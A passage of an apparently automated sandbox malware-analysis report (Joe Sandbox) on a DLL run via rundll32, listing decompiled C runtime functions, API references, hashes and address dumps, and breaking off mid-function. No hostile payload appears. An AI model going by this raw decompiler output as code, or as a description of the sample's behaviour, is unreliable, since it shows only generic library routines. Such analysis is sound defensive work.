                                                      • Opcode Fuzzy Hash: a01b1006e6bb933898f3c53528a737dd94d6a31eccef99a5c092665b370c7cef
                                                      • Instruction Fuzzy Hash: 02117F31941B04EBD531EFF5CC09FCB77DCAF44784F804C14A2AA66162DB68F6055760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7DB947, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • UnDecorator::UScore.LIBVCRUNTIME ref: 6E7DB94F
                                                      • DName::DName.LIBVCRUNTIME ref: 6E7DB959
                                                        • Part of subcall function 6E7DA04C: DName::doPchar.LIBVCRUNTIME ref: 6E7DA073
                                                      • UnDecorator::getScopedName.LIBVCRUNTIME ref: 6E7DB998
                                                      • DName::operator+=.LIBVCRUNTIME ref: 6E7DB9A2
                                                      • DName::operator+=.LIBCMT ref: 6E7DB9B1
                                                      • DName::operator+=.LIBCMT ref: 6E7DB9BD
                                                      • DName::operator+=.LIBCMT ref: 6E7DB9CA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                      • String ID:
                                                      • API String ID: 1480779885-0
                                                      • Opcode ID: 1baed1674e81653bdd7c47cf0e4edb9c95b22afe4f381c28331a93a155e50bf8
                                                      • Instruction ID: 53a89d190bd9d0da81c2c1d7ed062d450a3f8e76a78f7b3a5ad92c77902dce20
                                                      • Opcode Fuzzy Hash: 1baed1674e81653bdd7c47cf0e4edb9c95b22afe4f381c28331a93a155e50bf8
                                                      • Instruction Fuzzy Hash: 0511AD31900288EECB05DFE4CA98BEC7BB8BF01318F4444A9D0529B2B5DB70AE4DCB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77DF50, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E6E77DF50(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x6e78cf98 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E6E77BD8F( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6e78cf98 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x6e78c6f8)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x6e78cf98 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x6e78c6f8)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x6e78cf98 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E6E77B400( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x6e78cf98 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E6E781187(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E6E78053F(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E6E77F224(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x6e78cf98 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x6e78cf98 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x6e78cf98 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E6E77EB54( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E6E77EB54();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6E778727(_t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}






















































































                                                      0x6e77df5b
                                                      0x6e77df62
                                                      0x6e77df65
                                                      0x6e77df6a
                                                      0x6e77df72
                                                      0x6e77df75
                                                      0x6e77df79
                                                      0x6e77df7c
                                                      0x6e77df86
                                                      0x6e77df90
                                                      0x6e77df92
                                                      0x6e77df95
                                                      0x6e77df98
                                                      0x6e77df9e
                                                      0x6e77dfa0
                                                      0x6e77dfa7
                                                      0x6e77dfb4
                                                      0x6e77dfb5
                                                      0x6e77dfb8
                                                      0x6e77dfbb
                                                      0x6e77dfbc
                                                      0x6e77dfbd
                                                      0x6e77dfc0
                                                      0x6e77dfc5
                                                      0x6e77e2d1
                                                      0x6e77e2d1
                                                      0x6e77dfcb
                                                      0x6e77dfcb
                                                      0x6e77dfce
                                                      0x6e77dfd0
                                                      0x6e77dfd6
                                                      0x6e77dfd9
                                                      0x6e77dfe0
                                                      0x6e77dfe7
                                                      0x6e77dff0
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77dff6
                                                      0x6e77dffc
                                                      0x6e77dffe
                                                      0x6e77e000
                                                      0x6e77e003
                                                      0x6e77e008
                                                      0x6e77e00c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77e00c
                                                      0x6e77e011
                                                      0x6e77e014
                                                      0x6e77e016
                                                      0x6e77e01b
                                                      0x6e77e0cd
                                                      0x6e77e0ce
                                                      0x6e77e0d1
                                                      0x6e77e0d3
                                                      0x6e77e281
                                                      0x6e77e283
                                                      0x00000000
                                                      0x6e77e285
                                                      0x6e77e285
                                                      0x6e77e288
                                                      0x6e77e28b
                                                      0x6e77e294
                                                      0x6e77e297
                                                      0x6e77e298
                                                      0x6e77e29c
                                                      0x6e77e29f
                                                      0x6e77e29f
                                                      0x00000000
                                                      0x6e77e2a3
                                                      0x6e77e0d9
                                                      0x6e77e0d9
                                                      0x6e77e0de
                                                      0x6e77e0e1
                                                      0x6e77e0e7
                                                      0x6e77e0ed
                                                      0x6e77e0f6
                                                      0x6e77e0f9
                                                      0x6e77e0f9
                                                      0x6e77e0fa
                                                      0x6e77e0fb
                                                      0x6e77e0fe
                                                      0x6e77e0ff
                                                      0x00000000
                                                      0x6e77e0ff
                                                      0x6e77e021
                                                      0x6e77e030
                                                      0x6e77e031
                                                      0x6e77e034
                                                      0x6e77e036
                                                      0x6e77e03b
                                                      0x6e77e24c
                                                      0x6e77e24e
                                                      0x6e77e250
                                                      0x6e77e253
                                                      0x6e77e258
                                                      0x6e77e261
                                                      0x6e77e264
                                                      0x6e77e265
                                                      0x6e77e269
                                                      0x6e77e26c
                                                      0x6e77e26f
                                                      0x6e77e26f
                                                      0x6e77e273
                                                      0x6e77e273
                                                      0x6e77e273
                                                      0x6e77e276
                                                      0x6e77e276
                                                      0x6e77e276
                                                      0x6e77e278
                                                      0x6e77e278
                                                      0x6e77e27c
                                                      0x6e77e041
                                                      0x6e77e041
                                                      0x6e77e045
                                                      0x6e77e047
                                                      0x6e77e04a
                                                      0x6e77e04d
                                                      0x6e77e051
                                                      0x6e77e052
                                                      0x6e77e056
                                                      0x6e77e056
                                                      0x6e77e059
                                                      0x6e77e05e
                                                      0x6e77e06a
                                                      0x6e77e06f
                                                      0x6e77e072
                                                      0x6e77e072
                                                      0x6e77e077
                                                      0x6e77e079
                                                      0x6e77e07c
                                                      0x6e77e07e
                                                      0x6e77e081
                                                      0x6e77e084
                                                      0x6e77e087
                                                      0x6e77e08f
                                                      0x6e77e093
                                                      0x6e77e097
                                                      0x6e77e097
                                                      0x6e77e09d
                                                      0x6e77e0a3
                                                      0x6e77e0a6
                                                      0x6e77e0ae
                                                      0x6e77e0b5
                                                      0x6e77e0b9
                                                      0x6e77e0ba
                                                      0x6e77e0bd
                                                      0x6e77e0be
                                                      0x6e77e102
                                                      0x6e77e102
                                                      0x6e77e106
                                                      0x6e77e107
                                                      0x6e77e10c
                                                      0x6e77e112
                                                      0x00000000
                                                      0x6e77e118
                                                      0x6e77e11c
                                                      0x6e77e1a5
                                                      0x6e77e1ac
                                                      0x6e77e1b4
                                                      0x6e77e1bc
                                                      0x6e77e1c1
                                                      0x6e77e1c4
                                                      0x6e77e1c9
                                                      0x00000000
                                                      0x6e77e1cf
                                                      0x6e77e1e4
                                                      0x6e77e2c8
                                                      0x6e77e2ce
                                                      0x00000000
                                                      0x6e77e1ea
                                                      0x6e77e1f3
                                                      0x6e77e1f5
                                                      0x6e77e1fb
                                                      0x00000000
                                                      0x6e77e201
                                                      0x6e77e205
                                                      0x6e77e23b
                                                      0x6e77e23e
                                                      0x00000000
                                                      0x6e77e244
                                                      0x6e77e244
                                                      0x00000000
                                                      0x6e77e244
                                                      0x6e77e207
                                                      0x6e77e209
                                                      0x6e77e20b
                                                      0x6e77e224
                                                      0x00000000
                                                      0x6e77e22a
                                                      0x6e77e22e
                                                      0x00000000
                                                      0x6e77e234
                                                      0x6e77e234
                                                      0x6e77e237
                                                      0x6e77e238
                                                      0x00000000
                                                      0x6e77e238
                                                      0x6e77e22e
                                                      0x6e77e224
                                                      0x6e77e205
                                                      0x6e77e1fb
                                                      0x6e77e1e4
                                                      0x6e77e1c9
                                                      0x6e77e112
                                                      0x6e77e03b
                                                      0x00000000
                                                      0x6e77e123
                                                      0x6e77e123
                                                      0x6e77e126
                                                      0x6e77e12a
                                                      0x6e77e12d
                                                      0x6e77e14f
                                                      0x6e77e152
                                                      0x6e77e157
                                                      0x6e77e15b
                                                      0x6e77e15f
                                                      0x6e77e18d
                                                      0x6e77e18f
                                                      0x00000000
                                                      0x6e77e161
                                                      0x6e77e161
                                                      0x6e77e164
                                                      0x6e77e167
                                                      0x6e77e16a
                                                      0x6e77e2a5
                                                      0x6e77e2a8
                                                      0x6e77e2ab
                                                      0x6e77e2b5
                                                      0x6e77e2c0
                                                      0x6e77e2c5
                                                      0x00000000
                                                      0x6e77e170
                                                      0x6e77e177
                                                      0x6e77e17c
                                                      0x6e77e17f
                                                      0x6e77e182
                                                      0x00000000
                                                      0x6e77e188
                                                      0x6e77e188
                                                      0x00000000
                                                      0x6e77e188
                                                      0x6e77e182
                                                      0x6e77e16a
                                                      0x6e77e12f
                                                      0x6e77e133
                                                      0x6e77e136
                                                      0x6e77e13b
                                                      0x6e77e141
                                                      0x6e77e143
                                                      0x6e77e14a
                                                      0x6e77e190
                                                      0x6e77e193
                                                      0x6e77e194
                                                      0x6e77e199
                                                      0x6e77e19c
                                                      0x6e77e19f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77e19f
                                                      0x00000000
                                                      0x6e77e12d
                                                      0x6e77dfce
                                                      0x6e77e2d4
                                                      0x6e77e2d4
                                                      0x6e77e2d6
                                                      0x6e77e2d9
                                                      0x6e77e2d9
                                                      0x6e77e2d9
                                                      0x6e77e2d9
                                                      0x6e77e2eb
                                                      0x6e77e2ed
                                                      0x6e77e2ee
                                                      0x6e77e2ef
                                                      0x6e77e2f9

                                                      APIs
                                                      • GetConsoleCP.KERNEL32 ref: 6E77DF98
                                                      • __fassign.LIBCMT ref: 6E77E177
                                                      • __fassign.LIBCMT ref: 6E77E194
                                                      • WriteFile.KERNEL32(?,6E77BC02,00000000,?,00000000), ref: 6E77E1DC
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E77E21C
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E77E2C8
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                                      • String ID:
                                                      • API String ID: 4031098158-0
                                                      • Opcode ID: f8585f125cc3e176d89f26b33339f6f3de6976aa2a92656845a7f3a0367c2a9a
                                                      • Instruction ID: 7f8304c79a40c2deb755c6310776d3e1cf06bbe74616c6881aacb3254fb6cf2f
                                                      • Opcode Fuzzy Hash: f8585f125cc3e176d89f26b33339f6f3de6976aa2a92656845a7f3a0367c2a9a
                                                      • Instruction Fuzzy Hash: 99D18871D0065D9FDF21CFE8CA80AEDBBB9EF4A304F24416AE815BB251D731A946CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F5704, Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 6E7F5794
                                                      • _free.LIBCMT ref: 6E7F57AE
                                                      • _free.LIBCMT ref: 6E7F57B9
                                                      • _free.LIBCMT ref: 6E7F588D
                                                      • _free.LIBCMT ref: 6E7F58A9
                                                        • Part of subcall function 6E7E951D: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E7E951F
                                                        • Part of subcall function 6E7E951D: GetCurrentProcess.KERNEL32(C0000417,6E849074), ref: 6E7E9541
                                                        • Part of subcall function 6E7E951D: TerminateProcess.KERNEL32(00000000), ref: 6E7E9548
                                                      • _free.LIBCMT ref: 6E7F58B3
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
                                                      • String ID:
                                                      • API String ID: 2329545287-0
                                                      • Opcode ID: 94da3afbff6e3c180d54104758abaef654237bc2a24cc4d38eb7b8a2b3e68203
                                                      • Instruction ID: a35175fe08c57bf00ccbf988a656178312d2757a366a865a3ac68f617619bdbe
                                                      • Opcode Fuzzy Hash: 94da3afbff6e3c180d54104758abaef654237bc2a24cc4d38eb7b8a2b3e68203
                                                      • Instruction Fuzzy Hash: 43518D36D08201EBDB14CFE9F9546EA77ACEF45364F1484A9ED4497364EB319D038AA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7A25A0, Relevance: 9.2, APIs: 6, Instructions: 157COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7A25DD
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7A25FD
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7A2625
                                                      • __Getcoll.LIBCPMT ref: 6E7A26E5
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7A2764
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7A2796
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                                                      • String ID:
                                                      • API String ID: 1184649410-0
                                                      • Opcode ID: c431a5c0209149c9e0d7bb6ff12163884418080d45b6eb78c03c261160ba8026
                                                      • Instruction ID: d7bb9d5214e30a2bed11f4763af36313dad4f81a3bc63fd90b1eeb2dbf99287d
                                                      • Opcode Fuzzy Hash: c431a5c0209149c9e0d7bb6ff12163884418080d45b6eb78c03c261160ba8026
                                                      • Instruction Fuzzy Hash: B861CCB1C00249DFDB01CFD9CA84BEEBBB5EF41324F108659D519AB2A0D774AA04CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E802B6B, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 358COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _strpbrk.LIBCMT ref: 6E802BBA
                                                      • _free.LIBCMT ref: 6E802CD7
                                                        • Part of subcall function 6E7E951D: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E7E951F
                                                        • Part of subcall function 6E7E951D: GetCurrentProcess.KERNEL32(C0000417,6E849074), ref: 6E7E9541
                                                        • Part of subcall function 6E7E951D: TerminateProcess.KERNEL32(00000000), ref: 6E7E9548
                                                      • _free.LIBCMT ref: 6E802E9A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Process_free$CurrentFeaturePresentProcessorTerminate_strpbrk
                                                      • String ID: *?$.
                                                      • API String ID: 444239638-3972193922
                                                      • Opcode ID: c3a1d0f0c8879cf72e5216ab403bb7adda74f2ae1997f36bd390fe18a7e1c18c
                                                      • Instruction ID: 715bf61d206418b583aa8ab5cef68af1572af5b2f2917e9050c0263db3f21012
                                                      • Opcode Fuzzy Hash: c3a1d0f0c8879cf72e5216ab403bb7adda74f2ae1997f36bd390fe18a7e1c18c
                                                      • Instruction Fuzzy Hash: DEC18B75E0020A9FDB15CFE8CC809EEB7F9FF48314B24496AE815E7345E7759A018B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E80E488, Relevance: 9.1, APIs: 6, Instructions: 86threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 6E80E499
                                                      • OutputDebugStringA.KERNEL32(?), ref: 6E80E4AB
                                                      • IsDebuggerPresent.KERNEL32 ref: 6E80E4C6
                                                      • CreateThread.KERNEL32(00000000,00000000,6E80E67A,?,00000000,00000000), ref: 6E80E500
                                                      • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6E80E511
                                                      • CloseHandle.KERNEL32(00000000), ref: 6E80E524
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: DebuggerPresent$CloseCreateDebugHandleObjectOutputSingleStringThreadWait
                                                      • String ID:
                                                      • API String ID: 3708507090-0
                                                      • Opcode ID: a7056b600b4fca5b3f79cbd353226227dbb1bb14eef48fd16af7b80d65860241
                                                      • Instruction ID: 6aa88659ee64b5aff6223961746cb18424157a7044055fca29ff373d7f305242
                                                      • Opcode Fuzzy Hash: a7056b600b4fca5b3f79cbd353226227dbb1bb14eef48fd16af7b80d65860241
                                                      • Instruction Fuzzy Hash: 16219D32941A1ABBCF005FE98D09ADF7BA8EF46721B040E05FC2AE72D0E730850187A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E80E561, Relevance: 9.1, APIs: 6, Instructions: 86threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 6E80E572
                                                      • OutputDebugStringW.KERNEL32(?), ref: 6E80E584
                                                      • IsDebuggerPresent.KERNEL32 ref: 6E80E59F
                                                      • CreateThread.KERNEL32(00000000,00000000,6E80E69C,?,00000000,00000000), ref: 6E80E5D9
                                                      • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6E80E5EA
                                                      • CloseHandle.KERNEL32(00000000), ref: 6E80E5FD
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: DebuggerPresent$CloseCreateDebugHandleObjectOutputSingleStringThreadWait
                                                      • String ID:
                                                      • API String ID: 3708507090-0
                                                      • Opcode ID: 1fa29589c2d0766759b3d4af732832a60d89b922526cd5149951476ee689b69b
                                                      • Instruction ID: 2e07cad8da689258a5207b381b3bbd1b587c6391b116643710561ab86106f814
                                                      • Opcode Fuzzy Hash: 1fa29589c2d0766759b3d4af732832a60d89b922526cd5149951476ee689b69b
                                                      • Instruction Fuzzy Hash: 0B21903294161AAFDF105FE99C09ADFBBA8AF46721B000A05F835E72D0D7318501CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7BBB0E, Relevance: 9.1, APIs: 6, Instructions: 70COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowcodecvt
                                                      • String ID:
                                                      • API String ID: 19020681-0
                                                      • Opcode ID: da30db541dfe4a07a15516fd5fd846ecce60271f5508bad0ffe5ed4bacfa2bd6
                                                      • Instruction ID: 080d757885aeec650b4cd05f0cba014e8621fefd41f24d04e58bca1694bbfaba
                                                      • Opcode Fuzzy Hash: da30db541dfe4a07a15516fd5fd846ecce60271f5508bad0ffe5ed4bacfa2bd6
                                                      • Instruction Fuzzy Hash: DE21D8719002199BCF01DFE4CA58AEE77BDEF45364F10081AE814AB2B4DF74AA04CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E779FC9, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E6E779FC9(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6e78c020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6E77B200(_t13, __eflags,  *0x6e78c020);
					_t14 = _t23;
